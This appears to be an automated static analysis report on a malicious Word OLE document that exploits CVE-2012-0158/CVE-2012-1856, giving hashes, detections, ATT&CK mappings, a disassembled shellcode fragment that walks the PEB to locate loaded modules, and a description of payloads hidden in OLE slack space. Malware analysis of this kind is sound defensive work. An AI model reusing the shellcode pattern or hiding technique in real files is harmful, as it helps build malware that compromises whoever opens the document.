Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42db6dbe30c4466d…

MALICIOUS

Office (OLE)

114.5 KB Created: 2006-09-28 17:06:00 Authoring application: Microsoft Office Word First seen: 2015-09-19
MD5: 009aa88533f94b9032588ca4f05b81c0 SHA-1: d5dc45fd1c0cb0d5ebb157250118d436b636ca9e SHA-256: 42db6dbe30c4466d9b32dd91f69bd1b09ccbfc9b0643a619c034acd728f89069
180 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The file is identified as malicious due to the exploitation of CVE-2012-0158/CVE-2012-1856, a known vulnerability in MSCOMCTL.Toolbar. This vulnerability allows for arbitrary code execution when the document is opened. The large slack space in the OLE structure and PEB access heuristics further support the malicious nature of the file.

Heuristics 4

  • MSCOMCTL.Toolbar — CVE-2012-0158 / CVE-2012-1856 high CVE likely CVE_2012_1856
    MSCOMCTL.Toolbar — CVE-2012-0158 / CVE-2012-1856
  • ClamAV: Doc.Exploit.CVE_2012_0158-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Exploit.CVE_2012_0158-17
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    00003D46  648b1530000000    mov edx, dword ptr fs:[0x30]
00003D4D  8b520c            mov edx, dword ptr [edx + 0xc]
00003D50  8b521c            mov edx, dword ptr [edx + 0x1c]
00003D53  8b5a08            mov ebx, dword ptr [edx + 8]
00003D56  8b5a08            mov ebx, dword ptr [edx + 8]
00003D59  8b4a20            mov ecx, dword ptr [edx + 0x20]
00003D5C  8b12              mov edx, dword ptr [edx]
00003D5E  81790c33003200    cmp dword ptr [ecx + 0xc], 0x320033
00003D65  75ef              jne 0x3d56
00003D67  6683791800        cmp word ptr [ecx + 0x18], 0
00003D6C  75e8              jne 0x3d56
00003D6E  8b7d08            mov edi, dword ptr [ebp + 8]
00003D71  b90e000000        mov ecx, 0xe
00003D76  e8a9010000        call 0x3f24
00003D7B  c9                leave
00003D7C  c20400            ret 4
00003D7F  55                push ebp
00003D80  8bec              mov ebp, esp
00003D82  33ff              xor edi, edi
00003D84  b980000000        mov ecx, 0x80
00003D89  57                push edi
00003D8A  e2fd              loop 0x3d89
00003D8C  47                inc edi
00003D8D  8d5df4            lea ebx, [ebp - 0xc]
00003D90  53                push ebx
00003D91  57                push edi
00003D92  ff5630            call dword ptr [esi + 0x30]
00003D95  83f8ff            cmp eax, -1
00003D98  74f2              je 0x3d8c
00003D9A  3d00200000        cmp eax, 0x2000
00003D9F  76eb              jbe 0x3d8c
00003DA1  8945fc            mov dword ptr [ebp - 4], eax
00003DA4  89                .byte 0x89
00003DA5  7d                .byte 0x7d
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 117,264 bytes but its declared streams total only 16,640 bytes — 100,624 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Open this report in the interactive analyzer, or submit your own file for analysis.